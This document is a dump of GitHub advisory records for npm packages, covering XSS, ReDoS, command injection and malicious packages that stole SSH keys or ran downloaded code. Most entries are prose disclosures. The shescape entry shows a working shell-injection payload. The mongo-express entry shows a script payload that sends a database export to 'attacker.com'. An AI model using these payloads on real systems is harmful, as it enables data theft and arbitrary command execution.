{'https://github.com/felixrieseberg/windows-build-tools/commit/9835d33e68f2cb5e4d148e954bb3ed0221d98e90', 'https://nodesecurity.io/advisories/304', 'https://github.com/advisories/GHSA-9p47-w5xp-f4xr', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16003', 'https://github.com/felixrieseberg/windows-build-tools/commit/9835d33e68f2cb5e4d148e954bb3ed0221d98e90)', 'https://www.npmjs.com/advisories/304'}
null
npm
GHSA-hjp8-2cm3-cc45
Cookie exposure in requestretry
Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository fgribreau/node-request-retry prior to 7.0.0 via cookies being leaked to external sites.
{'CVE-2022-0654'}
2022-03-03T22:02:13Z
2022-02-24T00:00:54Z
HIGH
null
{'CWE-200'}
{'https://huntr.dev/bounties/a779faf5-c2cc-48be-a31d-4ddfac357afc', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0654', 'https://github.com/fgribreau/node-request-retry/commit/0979c6001d9d57c2aac3157c11b007397158922a'}
null
npm
GHSA-hwcf-pp87-7x6p
Moderate severity vulnerability that affects ejs
nodejs ejs version older than 2.5.5 is vulnerable to a Cross-site-scripting in the ejs.renderFile() resulting in code injection
{'CVE-2017-1000188'}
2021-09-14T17:32:09Z
2017-11-30T23:15:05Z
MODERATE
null
{'CWE-79'}
{'http://www.securityfocus.com/bid/101889', 'https://github.com/advisories/GHSA-hwcf-pp87-7x6p', 'https://nvd.nist.gov/vuln/detail/CVE-2017-1000188', 'https://github.com/mde/ejs/commit/49264e0037e313a0a3e033450b5c184112516d8f', 'https://github.com/mde/ejs'}
null
npm
GHSA-66rh-8fw6-59q6
Prototype Pollution in assign-deep
Versions of `assign-deep` prior to 1.0.1 are vulnerable to Prototype Pollution. The `assign` function fails to validate which Object properties it updates. This allows attackers to modify the prototype of Object, causing the addition or modification of an existing property on all objects. ## Recommendation Upgrade to version 1.0.1 or later.
{'CVE-2019-10745'}
2021-07-27T21:04:17Z
2019-08-21T16:15:13Z
HIGH
null
{'CWE-915', 'CWE-20'}
{'https://www.npmjs.com/advisories/1014', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10745', 'https://snyk.io/vuln/SNYK-JS-ASSIGNDEEP-450211'}
null
npm
GHSA-h9wr-xr4r-66fh
Cross-Site Scripting in dmn-js-properties-panel
Versions of `dmn-js-properties-panel` prior to 0.8.0 are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize input in specially configured diagrams, which may allow attackers to inject arbitrary JavaScript in the embedding website. ## Recommendation Upgrade to version 0.3.0 or later.
null
2020-08-31T18:46:37Z
2020-09-03T18:20:20Z
HIGH
null
{'CWE-79'}
{'https://www.npmjs.com/advisories/1081'}
null
npm
GHSA-h96f-fc7c-9r55
Regex denial of service vulnerability in codesample plugin
### Impact A regex denial of service (ReDoS) vulnerability was discovered in a dependency of the `codesample` plugin. The vulnerability allowed poorly formed ruby code samples to lock up the browser while performing syntax highlighting. This impacts users of the `codesample` plugin using TinyMCE 5.5.1 or lower. ### Patches This vulnerability has been patched in TinyMCE 5.6.0 by upgrading to a version of the dependency without the vulnerability. ### Workarounds To work around this vulnerability, either: - Upgrade to TinyMCE 5.6.0 or higher - Disable the `codesample` plugin - Disable ruby code samples using the [codesample_languages](https://www.tiny.cloud/docs/plugins/opensource/codesample/#exampleusingcodesample_languages) setting - Override the PrismJS syntax highlighter to version 1.21.0 or higher using the [codesample_global_prismjs](https://www.tiny.cloud/docs/plugins/opensource/codesample/#codesample_global_prismjs) setting ### Acknowledgements Tiny Technologies would like to thank Erik Krogh Kristensen at GitHub for discovering this vulnerability. ### References https://www.tiny.cloud/docs/release-notes/release-notes56/#securityfixes ### For more information If you have any questions or comments about this advisory: * Open an issue in the [TinyMCE repo](http://github.com/tinymce/tinymce/issues) * Email us at [infosec@tiny.cloud](mailto:infosec@tiny.cloud)
null
2021-01-06T19:25:24Z
2021-01-06T19:25:46Z
LOW
null
{'CWE-400'}
{'https://github.com/tinymce/tinymce/security/advisories/GHSA-h96f-fc7c-9r55', 'https://www.tiny.cloud/docs/release-notes/release-notes56/#securityfixes', 'https://www.npmjs.com/package/tinymce'}
null
npm
GHSA-9hc2-w9gg-q6jw
Malicious Package in boogeyman
All versions of `boogeyman` are considered malicious. This particular package would download a payload from pastebin.com, eval it to read ssh keys and the users `.npmrc` and send them to a private pastebin account. ## Recommendation This package was published to the npm Registry for a very short period of time. If you happen to find it in your environment you should revoke and rotate your ssh keys and your npm token.
null
2021-10-01T13:28:13Z
2020-09-01T21:07:41Z
CRITICAL
null
{'CWE-506'}
{'https://www.npmjs.com/advisories/677'}
null
npm
GHSA-mfc2-93pr-jf92
Malicious code in `loadyaml`
npm packages `loadyaml` and `electorn` were removed from the npm registry for containing malicious code. Upon installation the package runs a preinstall script that writes a public comment on GitHub containing the following information: - IP and IP-based geolocation - home directory name - local username The malicious packages have been removed from the npm registry and the leaked content removed from GitHub.
null
2020-10-01T17:09:29Z
2020-10-01T17:10:15Z
CRITICAL
null
{'CWE-506'}
{'https://www.npmjs.com/advisories/1563'}
null
npm
GHSA-f2rp-38vg-j3gh
Null characters not escaped
### Impact Anyone using _Shescape_ to defend against shell injection may still be vulnerable against shell injection if the attacker manages to insert a [null character](https://en.wikipedia.org/wiki/Null_character) into the payload. For example (on Windows): ```javascript const cp = require("child_process"); const shescape = require("shescape"); const nullChar = String.fromCharCode(0); const payload = "foo\" && ls -al ${nullChar} && echo \"bar"; console.log(cp.execSync(`echo ${shescape.quote(payload)}`)); // foototal 3 // drwxr-xr-x 1 owner XXXXXX 0 Mar 13 18:44 . // drwxr-xr-x 1 owner XXXXXX 0 Mar 13 00:09 .. // drwxr-xr-x 1 owner XXXXXX 0 Mar 13 18:42 folder // -rw-r--r-- 1 owner XXXXXX 0 Mar 13 18:42 file ``` ### Patches The problem has been patched in [v1.1.3](https://github.com/ericcornelissen/shescape/releases/tag/v1.1.3) which you can upgrade to now. No further changes are required. ### Workarounds Alternatively, null characters can be stripped out manually using e.g. `arg.replace(/\u{0}/gu, "")`
{'CVE-2021-21384'}
2021-03-18T23:43:39Z
2021-03-18T23:47:56Z
HIGH
null
{'CWE-88'}
{'https://github.com/ericcornelissen/shescape/releases/tag/v1.1.3', 'https://github.com/ericcornelissen/shescape/commit/07a069a66423809cbedd61d980c11ca44a29ea2b', 'https://github.com/ericcornelissen/shescape/security/advisories/GHSA-f2rp-38vg-j3gh', 'https://www.npmjs.com/package/shescape', 'https://nvd.nist.gov/vuln/detail/CVE-2021-21384'}
null
npm
GHSA-h24f-9mm4-w336
Cross-site Scripting (XSS) - Stored in crud-file-server
Versions of `crud-file-server` before 0.8.0 are vulnerable to stored cross-site scripting (XSS). This is due to insufficient santiziation of filenames when directory index is served by `crud-file-server`. ## Recommendation Update to version 0.8.0 or later.
{'CVE-2018-3726'}
2020-08-31T18:28:12Z
2018-07-18T18:34:27Z
CRITICAL
null
{'CWE-79'}
{'https://nvd.nist.gov/vuln/detail/CVE-2018-3726', 'https://github.com/omphalos/crud-file-server/commit/4155bfe068bf211b49a0b3ffd06e78cbaf1b40fa', 'https://www.npmjs.com/advisories/570', 'https://github.com/advisories/GHSA-h24f-9mm4-w336', 'https://hackerone.com/reports/311101'}
null
npm
GHSA-whv6-rj84-2vh2
Cross-Site Scripting in nextcloud-vue-collections
Versions of `nextcloud-vue-collections` prior to 0.4.2 are vulnerable to Cross-Site Scripting (XSS). The `v-tooltip` component has an insecure `defaultHTML` configuration that allows arbitrary JavaScript to be injected in the tooltip of a collection item. This allows attackers to execute arbitrary code in a victim's browser. ## Recommendation Upgrade to version 0.4.2 or later.
null
2021-10-04T20:36:41Z
2020-09-04T17:21:58Z
HIGH
null
{'CWE-79'}
{'https://www.npmjs.com/advisories/1442', 'https://github.com/juliushaertl/nextcloud-vue-collections', 'https://github.com/juliushaertl/nextcloud-vue-collections/commit/8ec1fca214f003538cec4137792ede928f25f583'}
null
npm
GHSA-p2c4-gxp4-j3xp
Denial of service in Valine
Valine is a fast, simple & powerful comment system. Valine 1.4.14 allows remote attackers to cause a denial of service (application outage) by supplying a ua (aka User-Agent) value that only specifies the product and version.
{'CVE-2021-34801'}
2022-05-04T03:11:25Z
2021-06-21T17:11:25Z
MODERATE
null
{'CWE-94'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-34801', 'https://github.com/xCss/Valine/issues/366', 'https://github.com/xCss/Valine'}
null
npm
GHSA-3xc7-xg67-pw99
Sensitive Data Exposure in sequelize-cli
Versions of `sequelize-cli` prior to 5.5.0 are vulnerable to Sensitive Data Exposure. The function `filteredURL()` does not properly sanitize the `config.password` value which may cause passwords with special characters to be logged in plain text. ## Recommendation Upgrade to version 5.5.0 or later.
null
2021-08-04T20:54:45Z
2019-06-05T20:43:10Z
LOW
null
{'CWE-532'}
{'https://github.com/sequelize/cli/pull/722', 'https://github.com/sequelize/cli/issues/172', 'https://snyk.io/vuln/SNYK-JS-SEQUELIZECLI-174320', 'https://www.npmjs.com/advisories/825', 'https://github.com/FelixLC/cli/commit/da59652c061a798282e18efad0b6d0afefa15465'}
null
npm
GHSA-4f6x-49g2-99fm
Cross-site Scripting in Mermaid
Mermaid before 8.11.0 allows XSS when the antiscript feature is used.
{'CVE-2021-35513'}
2021-07-02T16:59:18Z
2021-12-10T18:57:41Z
MODERATE
null
{'CWE-79'}
{'https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2', 'https://github.com/mermaid-js/mermaid/pull/2123/commits/3d22fa5d2435de5acc18de6f88474a6e8675a60e', 'https://github.com/mermaid-js/mermaid/issues/2122', 'https://nvd.nist.gov/vuln/detail/CVE-2021-35513', 'https://github.com/mermaid-js/mermaid/pull/2123'}
null
npm
GHSA-jcw8-r9xm-32c6
Command Injection in dns-sync
Affected versions of `dns-sync` have an arbitrary command execution vulnerability in the `resolve()` method. ## Recommendation - Use an alternative dns resolver - Do not allow untrusted input into `dns-sync.resolve()`
{'CVE-2017-16100'}
2020-08-31T18:26:20Z
2018-07-18T18:28:02Z
CRITICAL
null
{'CWE-94'}
{'https://github.com/skoranga/node-dns-sync/issues/1', 'https://www.npmjs.com/advisories/523', 'https://nodesecurity.io/advisories/523', 'https://github.com/skoranga/node-dns-sync/commit/d9abaae384b198db1095735ad9c1c73d7b890a0d', 'https://github.com/advisories/GHSA-jcw8-r9xm-32c6', 'https://github.com/skoranga/node-dns-sync/issues/1)', 'https://github.com/skoranga/node-dns-sync/issues/5', 'https://www.npmjs.com/advisories/153', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16100', 'https://github.com/skoranga/node-dns-sync/commit/d9abaae384b198db1095735ad9c1c73d7b890a0d)))'}
null
npm
GHSA-4xf9-pgvv-xx67
Regular Expression Denial of Service in simple-markdown
Versions of `simple-markdown` prior to 0.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS). The `SimpleMarkdown.defaultInlineParse()` function has significantly degraded performance when parsing inline code blocks. ## Recommendation Upgrade to version 0.5.2 or later.
null
2021-09-29T18:16:33Z
2020-09-03T20:27:46Z
MODERATE
null
{'CWE-400'}
{'https://github.com/Khan/simple-markdown', 'https://www.npmjs.com/advisories/1147', 'https://snyk.io/vuln/SNYK-JS-SIMPLEMARKDOWN-460540', 'https://github.com/Khan/simple-markdown/issues/71'}
null
npm
GHSA-pj7m-g53m-7638
Moderate severity vulnerability that affects bootstrap
In Bootstrap before 4.1.2, XSS is possible in the data-target property of scrollspy. This is similar to CVE-2018-14042.
{'CVE-2018-14041'}
2021-06-15T16:33:23Z
2018-09-13T15:49:56Z
MODERATE
null
{'CWE-79'}
{'https://lists.apache.org/thread.html/r3dc0cac8d856bca02bd6997355d7ff83027dcfc82f8646a29b89b714@%3Cissues.hbase.apache.org%3E', 'https://github.com/advisories/GHSA-pj7m-g53m-7638', 'https://github.com/twbs/bootstrap/issues/26627', 'https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E', 'http://seclists.org/fulldisclosure/2019/May/13', 'https://lists.apache.org/thread.html/52e0e6b5df827ee7f1e68f7cc3babe61af3b2160f5d74a85469b7b0e@%3Cdev.superset.apache.org%3E', 'http://seclists.org/fulldisclosure/2019/May/10', 'https://github.com/twbs/bootstrap/pull/26630', 'https://seclists.org/bugtraq/2019/May/18', 'https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E', 'https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E', 'http://seclists.org/fulldisclosure/2019/May/11', 'https://github.com/twbs/bootstrap/issues/26423', 'http://packetstormsecurity.com/files/152787/dotCMS-5.1.1-Vulnerable-Dependencies.html', 'https://blog.getbootstrap.com/2018/07/12/bootstrap-4-1-2/', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'http://packetstormsecurity.com/files/156743/OctoberCMS-Insecure-Dependencies.html', 'https://nvd.nist.gov/vuln/detail/CVE-2018-14041', 'https://access.redhat.com/errata/RHSA-2019:1456'}
null
npm
GHSA-8whr-v3gm-w8h9
Command Injection in node-rules
Versions of `node-rules` prior to 5.0.0 are vulnerable to Command Injection. The package fails to sanitize input rules and passes it directly to an `eval` call when using the `fromJSON` function. This may allow attackers to execute arbitrary code in the system if the rules are user-controlled. ## Recommendation Upgrade to version 5.0.0 or later.
null
2021-10-04T21:08:30Z
2020-09-03T15:51:04Z
HIGH
null
{'CWE-78'}
{'https://www.npmjs.com/advisories/1499', 'https://github.com/mithunsatheesh/node-rules/issues/84', 'https://github.com/mithunsatheesh/node-rules', 'https://snyk.io/vuln/SNYK-JS-NODERULES-560426'}
null
npm
GHSA-g5q2-fcg9-j526
Malicious Package in hsf-clients
All versions of `hsf-clients` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it. ## Recommendation Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
null
2021-09-30T19:46:50Z
2020-09-03T17:40:18Z
CRITICAL
null
{'CWE-506'}
{'https://www.npmjs.com/advisories/1054'}
null
npm
GHSA-hrpp-f84w-xhfg
Outdated Static Dependency in vue-moment
Versions of `vue-moment` prior to 4.1.0 contain an Outdated Static Dependency. The package depends on `moment` and has it loaded statically instead of as a dependency that can be updated. It has `moment@2.19.1` that contains a Regular Expression Denial of Service vulnerability. ## Recommendation Upgrade to version 4.1.0 or later.
null
2021-10-04T19:13:23Z
2020-09-04T16:55:06Z
MODERATE
null
{'CWE-1104'}
{'https://snyk.io/vuln/SNYK-JS-VUEMOMENT-538934', 'https://www.npmjs.com/advisories/532', 'https://github.com/brockpetrie/vue-moment/commit/a265e54660a7181a6795a12a97cebac5b305746e', 'https://www.npmjs.com/advisories/1425', 'https://github.com/brockpetrie/vue-moment'}
null
npm
GHSA-whrh-9j4q-g7ph
CSRF Vulnerability in polaris-website
### Impact CSRF vulnerability: In some very specific circumstances, an attacker would be able to update your settings. Basically you would need to navigate to hackersite.com while logged into our panel. Then they could modify your settings. They couldn't check if it worked, nor could they read your settings. ### Patches As of v1.1.1 this has been patched by implementing the Double submit pattern using a cookie. ### For more information If you have any questions or comments about this advisory: * Open an issue in [Polaris-React](https://github.com/polaris-rbx/polaris-react) * Email us at [hi@nezto.re](mailto:hi@nezto.re) * Join our discord (preferred): https://discord.gg/QevWabU
null
2021-09-23T18:38:11Z
2020-08-05T21:43:19Z
MODERATE
null
{'CWE-352'}
{'https://owasp.org/www-community/attacks/csrf', 'https://github.com/polaris-rbx/Polaris-React/commit/b64673d91e83c0737616a0770d8208727730808b', 'https://github.com/polaris-rbx/Polaris-React/security/advisories/GHSA-whrh-9j4q-g7ph', 'https://www.barracuda.com/glossary/csrf', 'https://snyk.io/vuln/SNYK-JS-POLARISWEBSITE-597473', 'https://medium.com/cross-site-request-forgery-csrf/double-submit-cookie-pattern-65bb71d80d9f', 'https://github.com/polaris-rbx/Polaris-React'}
null
npm
GHSA-pp4v-55vr-9gxh
Regular Expression Denial of Service in riot-compiler
Affected versions of `riot-compiler` are susceptible to a regular expression denial of service vulnerability. ## Recommendation Update to version 2.3.22 or later.
{'CVE-2016-10527'}
2020-08-31T18:10:18Z
2019-02-18T23:39:13Z
MODERATE
null
{'CWE-400'}
{'https://nvd.nist.gov/vuln/detail/CVE-2016-10527', 'https://github.com/advisories/GHSA-pp4v-55vr-9gxh', 'https://github.com/riot/compiler/issues/46', 'https://nodesecurity.io/advisories/86', 'https://www.npmjs.com/advisories/86'}
null
npm
GHSA-v4rh-8p82-6h5w
Regular expression denial of service in url-regex
all versions of url-regex are vulnerable to Regular Expression Denial of Service. An attacker providing a very long string in String.test can cause a Denial of Service.
{'CVE-2020-7661'}
2021-09-22T18:35:57Z
2020-06-22T14:39:03Z
HIGH
null
{'CWE-400'}
{'https://snyk.io/vuln/SNYK-JS-URLREGEX-569472', 'https://github.com/kevva/url-regex', 'https://github.com/kevva/url-regex/issues/70', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7661'}
null
npm
GHSA-7p8h-86p5-wv3p
Cross-site scripting
Two kinds of XSS were found: 1. As mentioned in https://github.com/mongo-express/mongo-express/issues/577 when the content of a cell grows larger than supported size, clicking on a row will show full document unescaped, however this needs admin interaction on cell. 2. Data cells identified as media will be rendered as media, without being sanitized. Example of different renders: image, audio, video, etc. ### Impact As an example of type 1 attack, an unauthorized user who only can send a large amount of data in a field of a document may use this payload: ```JSON {"someField": "long string here to surpass the limit of document ...... <script> await fetch('http://localhost:8081/db/testdb/export/users').then( async res => await fetch('http://attacker.com?backup='+encodeURIComponent((await res.text())))) </script>" } ``` This will send an export of a collection to the attacker without even admin knowing. Other types of attacks such as dropping a database\collection are also possible. ### Patches Upgrade to `v1.0.0-alpha.4` ### For more information If you have any questions or comments about this advisory: * Open an issue in [mongo-express](https://github.com/mongo-express/mongo-express/issues/new) * Email me at [jafar.akhoondali@gmail.com](mailto:jafar.akhoondali@gmail.com)
{'CVE-2021-21422'}
2021-06-22T15:44:45Z
2021-06-28T17:18:04Z
HIGH
null
{'CWE-79'}
{'https://github.com/mongo-express/mongo-express/issues/577', 'https://github.com/mongo-express/mongo-express/commit/f5e0d4931f856f032f22664b5e5901d5950cfd4b', 'https://github.com/mongo-express/mongo-express/security/advisories/GHSA-7p8h-86p5-wv3p', 'https://nvd.nist.gov/vuln/detail/CVE-2021-21422'}
null